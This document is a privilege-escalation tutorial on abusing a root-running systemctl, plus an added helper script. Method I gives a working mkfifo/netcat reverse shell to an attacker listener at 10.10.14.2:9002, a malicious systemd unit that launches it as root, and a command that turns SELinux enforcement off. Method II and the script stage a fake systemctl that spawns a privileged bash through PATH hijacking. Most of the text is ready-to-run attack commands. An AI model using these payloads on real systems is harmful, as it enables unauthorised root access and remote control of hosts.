This works when you find that systemctl runs as root: for example, the binary is SUID root, or sudo -l shows you may run systemctl (ideally NOPASSWD). systemd starts unit files as root, so you can write your own service whose ExecStart is a payload and ask the root-privileged systemctl to start it. That can be done as follows.
METHOD - I
Create a file named test.sh on the target machine containing a reverse shell (10.10.14.2:9002 is the attacker's listener; change it to yours):
#!/bin/sh
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.2 9002 > /tmp/f
Save it as /home/bhanu/test.sh and make it executable:
chmod +x /home/bhanu/test.sh
Now create a service unit and save it as /home/bhanu/mys.service. ExecStart must be an absolute path, which is why the script is launched through /bin/bash:
[Unit]
Description=Example systemd service.
[Service]
Type=simple
ExecStart=/bin/bash /home/bhanu/test.sh
[Install]
WantedBy=multi-user.target
# Alternative unit - USE ONLY ONE OF THE TWO. This one just writes the output of id to /tmp/output, a quick way to confirm the unit really ran as root before wiring up the reverse shell.
[Unit]
Description=Example systemd service.
[Service]
Type=simple
ExecStart=/bin/bash -p -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target
# If the unit does not start, first make systemd re-read its unit files. Only if SELinux is enforcing and blocking the unit, put it in permissive mode as well:
sudo systemctl daemon-reload
sudo setenforce 0
# Not mandatory, but unit files are normally mode 0644
chmod 644 /home/bhanu/mys.service
# Enable the service. Enabling by absolute path links the file into systemd's unit search path; run this (and the commands below) through whatever gives you root systemctl: sudo systemctl if sudo allows it, or the SUID binary directly.
systemctl enable /home/bhanu/mys.service
# Check the status in case of errors. Refer to the unit by name here, not by path.
systemctl status mys.service
Open a new terminal on Kali and start a listener:
nc -nvlp 9002
On the victim machine, start the service:
systemctl start mys.service
The reverse shell arrives on the listener running as root, because systemd started the unit.
METHOD - II
This is PATH hijacking. It works when a program that runs as root (a SUID binary, a root cron job, or a script run with sudo that keeps your PATH) calls systemctl by name instead of by absolute path, so the lookup goes through PATH, and PATH is yours to change.
echo $PATH          // see the current search order
systemctl           // runs the real systemctl found through PATH
cd /tmp
nano systemctl      // create a file named systemctl containing the payload, e.g. the single line: /bin/bash -p
chmod +x /tmp/systemctl
PATH=/tmp:$PATH
export PATH
systemctl           // now runs /tmp/systemctl, i.e. your bash, instead of the real one
Setting PATH in your own shell only proves the hijack works; you still have to trigger the root-running program that calls systemctl, and it must inherit this PATH. It is that program's root or SUID context that turns the call into a root shell, and -p keeps the effective uid when bash is launched from a SUID root process.
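A small script that stages the hijack from Method II and checks it took, added here as an example and not code from the original post. The function names stage_fake_systemctl, resolve_with_hijack and resolve_plain are my own; it needs no root and touches only a directory you pass in, so you can run it on any box to see how a bare systemctl lookup changes.

```shell
#!/bin/sh
# Added example, not the original post's code. Stages a fake "systemctl" in a directory
# you control, prepends that directory to PATH and confirms that a by-name lookup now
# resolves to the fake. The root shell itself only appears when a root-running program
# (SUID binary, root cron job, sudo-run script that keeps your PATH) calls plain
# "systemctl" under this PATH; sudo's secure_path normally defeats this for sudo itself.

# Create <dir>/systemctl whose only job is to hand us a shell. -p keeps the effective uid
# when the fake is executed from a SUID root process. Prints the fake's path.
stage_fake_systemctl() {
  dir="$1"
  mkdir -p "$dir"
  cat > "$dir/systemctl" <<'EOF'
#!/bin/sh
exec /bin/bash -p
EOF
  chmod 755 "$dir/systemctl"
  echo "$dir/systemctl"
}

# What does a bare "systemctl" resolve to once <dir> is first in PATH?
# Done in a subshell so the caller's own PATH is left untouched.
resolve_with_hijack() {
  dir="$1"
  ( PATH="$dir:$PATH"; export PATH; command -v systemctl )
}

# What does it resolve to without the hijack? Empty if systemctl is absent (e.g. a container).
resolve_plain() {
  command -v systemctl 2>/dev/null || true
}

# Usage on a target (the shell that then runs the vulnerable program must inherit this PATH):
#   stage_fake_systemctl /tmp
#   PATH="/tmp:$PATH"; export PATH
#   ./root_program_that_calls_systemctl_by_name
```

The two resolve functions give you a before/after check: if resolve_plain prints /bin/systemctl and resolve_with_hijack prints /tmp/systemctl, the lookup is hijacked and the only remaining question is whether the privileged caller really inherits your PATH.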